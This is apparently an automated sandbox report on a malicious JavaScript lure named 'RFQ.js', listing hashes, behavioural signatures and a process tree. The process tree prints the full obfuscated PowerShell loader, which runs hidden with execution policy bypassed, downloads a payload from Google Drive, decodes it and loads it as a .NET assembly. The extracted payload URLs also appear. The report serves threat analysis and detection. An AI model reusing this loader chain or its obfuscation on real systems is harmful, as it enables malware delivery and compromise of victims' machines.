Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01-11-2024 07:26
Static task
static1
Behavioral task
behavioral1
Sample
Collaboration Request/Company Info.js
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Collaboration Request/Company Info.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Collaboration Request/RFQ.js
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Collaboration Request/RFQ.js
Resource
win10v2004-20241007-en
General
-
Target
Collaboration Request/RFQ.js
-
Size
15KB
-
MD5
e1b56b06f44512e79ce26a1db4958fa0
-
SHA1
5c0a3a02fd37d85330012ac27ee59cd05466f866
-
SHA256
943e6c8dd31effd085cd83c1f681d8c2f5d7d1967b34dacfed7ac3db51d60c1b
-
SHA512
b5a3e3c82a812375da64ad2e7ba3820d9058adc2f5f3d45035984b27dec64451cbd45b547385e7de221e82b01967aff2495d33a826eb0738871c739a27b95770
-
SSDEEP
384:zktd8aCPI9hUmMLVmdZyukUnRHxHCiDze:QtdhC6hDYmdZKUnRRiiDze
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 1904 wscript.exe 4 1904 wscript.exe 8 2148 powershell.exe 10 2148 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1100 powershell.exe 2148 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 drive.google.com 8 drive.google.com -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1100 powershell.exe 2148 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 2148 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1904 wrote to memory of 1100 1904 wscript.exe 30 PID 1904 wrote to memory of 1100 1904 wscript.exe 30 PID 1904 wrote to memory of 1100 1904 wscript.exe 30 PID 1100 wrote to memory of 2148 1100 powershell.exe 32 PID 1100 wrote to memory of 2148 1100 powershell.exe 32 PID 1100 wrote to memory of 2148 1100 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Collaboration Request\RFQ.js"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcASABnAFcAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAKwAnADcAbgBzAGgAdAB0AHAAcwAnACsAJwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAEEASQBWAGcASgBKAEoAdgAxAEYANgB2AFMANABzAFUATwB5AGIAbgBIAC0AcwBEAHYAVQBoAEIAWQB3AHUAcgA3AG4AcwA7AEgAZwBXAHcAZQBiACcAKwAnAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBIAGcAVwBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAEgAZwBXAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAJwArACcAKABIAGcAVwBpACcAKwAnAG0AYQBnAGUAJwArACcAVQByAGwAKQA7AEgAZwBXAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgAnACsAJwBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAEgAZwBXAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AEgAZwBXAHMAdABhAHIAdABGAGwAYQBnACAAPQAgADcAbgBzADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4ANwBuAHMAOwBIAGcAVwBlAG4AZABGAGwAYQBnACAAPQAgADcAbgBzADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgA3AG4AcwA7AEgAZwBXAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAASABnAFcAaQBtAGEAZwBlAFQAZQB4AHQAJwArACcALgBJAG4AZABlAHgATwBmACgASABnAFcAcwB0AGEAcgB0AEYAbABhAGcAKQA7AEgAZwBXAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABIAGcAVwBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABIAGcAJwArACcAVwBlAG4AZABGAGwAYQBnACkAOwBIAGcAVwBzAHQAYQByAHQASQBuAGQAZQB4ACcAKwAnACAALQBnAGUAIAAnACsAJwAwACAALQBhAG4AZAAgAEgAZwBXAGUAbgBkAEkAbgBkAGUAeAAgAC0AJwArACcAZwB0ACAASABnAFcAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEgAZwBXAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABIAGcAVwBzAHQAYQByAHQARgBsAGEAZwAuACcAKwAnAEwAZQBuAGcAdABoADsASABnAFcAYgBhACcAKwAnAHMAZQA2ADQATABlAG4AZwB0AGgAJwArACcAIAA9ACAASABnAFcAZQAnACsAJwBuAGQASQBuAGQAZQB4ACAALQAgAEgAZwBXAHMAdABhAHIAdABJAG4AZABlAHgAOwBIAGcAVwBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAEgAZwBXAGkAbQBhACcAKwAnAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABIAGcAJwArACcAVwBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABIAGcAVwBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsASABnAFcAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgASABnAFcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABiAEcAcwAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAnACsAJwBIAGcAVwBfACAAfQAnACsAJwApAFsALQAxAC4ALgAtACgASABnAFcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AEgAZwBXAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2ACcAKwAnAGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABIAGcAVwBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7AEgAZwBXAGwAbwBhAGQAZQBkAEEAcwBzACcAKwAnAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AJwArACcAYQBkACgASABnAFcAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AEgAZwBXAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAJwArACcAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAJwArACcAKAA3AG4AcwBWAEEASQA3AG4AcwApADsASABnAFcAdgBhAGkATQBlAHQAaABvAGQALgAnACsAJwBJAG4AdgBvAGsAZQAoAEgAZwBXAG4AdQBsAGwALAAgAEAAKAAnACsAJwA3AG4AcwB0AHgAdAAuADEAbQB3AHgAeAAnACsAJwAvAHYAdwBlAG4ALwByAGIALgBtAG8AYwAuADUAMAAxAHIAZQAuAG8AbQBsAC8ALwA6AHMAcAB0AHQAaAA3AG4AcwAsACAANwBuAHMAJwArACcAZABlAHMAYQB0AGkAdgBhAGQAbwA3AG4AcwAsACAANwBuAHMAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwA3AG4AcwAsACAANwBuAHMAZABlAHMAYQB0AGkAdgBhAGQAbwA3AG4AcwAsACAANwBuAHMAQwBhAHMAUABvAGwANwBuAHMALAAgADcAbgBzAGQAZQBzAGEAdABpAHYAYQBkAG8ANwBuAHMALAA3AG4AcwBkAGUAcwBhAHQAaQB2AGEAZABvADcAbgBzACwAJwArACcANwBuAHMAZABlAHMAYQB0AGkAdgBhAGQAbwA3AG4AJwArACcAcwAsADcAbgBzAFUAUgBMADcAbgBzACwAIAA3AG4AcwBDADoANABnAFcAUAByAG8AZwByAGEAbQBEAGEAdABhADQAZwBXADcAbgBzACwANwBuAHMAJwArACcAbgBlACcAKwAnAG0AdQA3AG4AcwAsADcAbgBzAGoAcwA3AG4AcwAsADcAbgBzADEANwBuAHMALAA3AG4AcwAxADcAbgBzACkAKQA7ACcAKQAgAC0AQwByAEUAUABMAEEAYwBlACgAWwBjAEgAQQBSAF0AOQA4ACsAWwBjAEgAQQBSAF0ANwAxACsAWwBjAEgAQQBSAF0AMQAxADUAKQAsAFsAYwBIAEEAUgBdADEAMgA0ACAAIAAtAHIAZQBQAEwAQQBjAEUAIAAgACcANABnAFcAJwAsAFsAYwBIAEEAUgBdADkAMgAgACAALQBDAHIARQBQAEwAQQBjAGUAIAAgACgAWwBjAEgAQQBSAF0ANwAyACsAWwBjAEgAQQBSAF0AMQAwADMAKwBbAGMASABBAFIAXQA4ADcAKQAsAFsAYwBIAEEAUgBdADMANgAgAC0AcgBlAFAATABBAGMARQAgACgAWwBjAEgAQQBSAF0ANQA1ACsAWwBjAEgAQQBSAF0AMQAxADAAKwBbAGMASABBAFIAXQAxADEANQApACwAWwBjAEgAQQBSAF0AMwA5ACkAfAAuACgAIAAkAFAAUwBoAG8AbQBlAFsANABdACsAJABwAFMASABvAE0AZQBbADMAMABdACsAJwBYACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('HgWimageUrl = '+'7nshttps'+'://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur7ns;HgWweb'+'Client = New-Object System.Net.WebClient;HgWimageBytes = HgWwebClient.DownloadData'+'(HgWi'+'mage'+'Url);HgWimageText = [Syst'+'em.Text.Encoding]::UTF8.'+'GetSt'+'ring(HgWimageBytes);HgWstartFlag = 7ns<<BASE64_START>>7ns;HgWendFlag = 7ns<<BASE64_END>>7ns;HgWstartIndex = HgWimageText'+'.IndexOf(HgWstartFlag);HgWendIndex = HgWimageText.IndexOf(Hg'+'WendFlag);HgWstartIndex'+' -ge '+'0 -and HgWendIndex -'+'gt HgWstartIndex;HgWstartIndex += HgWstartFlag.'+'Length;HgWba'+'se64Length'+' = HgWe'+'ndIndex - HgWstartIndex;HgWbase64Command = HgWima'+'geText.Substring(Hg'+'WstartIndex, HgWbase64Length);HgWbase64Reversed = -join (HgWbase64Command.ToCharArray() bGs ForEach-Object { '+'HgW_ }'+')[-1..-(HgWbase64Command.Length)];HgWcommandBytes = [System.Conv'+'ert]::FromBase64String(HgWbase64Reversed);HgWloadedAss'+'embly = [System.Reflecti'+'on.Assembly]::Lo'+'ad(HgWcommandBytes);HgWvaiMethod = [dnl'+'ib.IO.Home].GetMethod'+'(7nsVAI7ns);HgWvaiMethod.'+'Invoke(HgWnull, @('+'7nstxt.1mwxx'+'/vwen/rb.moc.501re.oml//:sptth7ns, 7ns'+'desativado7ns, 7nsd'+'esativado7ns, 7nsdesativado7ns, 7nsCasPol7ns, 7nsdesativado7ns,7nsdesativado7ns,'+'7nsdesativado7n'+'s,7nsURL7ns, 7nsC:4gWProgramData4gW7ns,7ns'+'ne'+'mu7ns,7nsjs7ns,7ns17ns,7ns17ns));') -CrEPLAce([cHAR]98+[cHAR]71+[cHAR]115),[cHAR]124 -rePLAcE '4gW',[cHAR]92 -CrEPLAce ([cHAR]72+[cHAR]103+[cHAR]87),[cHAR]36 -rePLAcE ([cHAR]55+[cHAR]110+[cHAR]115),[cHAR]39)|.( $PShome[4]+$pSHoMe[30]+'X')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fc8d9f5113cddf307568e8fc8265a0d1
SHA1ebf691d80fd9bb8be6785e2612dd9015ee71d2e3
SHA2568bfcea2ee97881ddc9dbd35d311e59d2499b2bffa9bfbef55b0a64e70ce9fbc0
SHA512956d6837ffa18454a0d84e97032058959298987d6de038ae1fe8ba3e098e9f3580086d1f3c563335dfe79954aa50fb553a5a85c2f53486afa7ad50a34bb5bcb0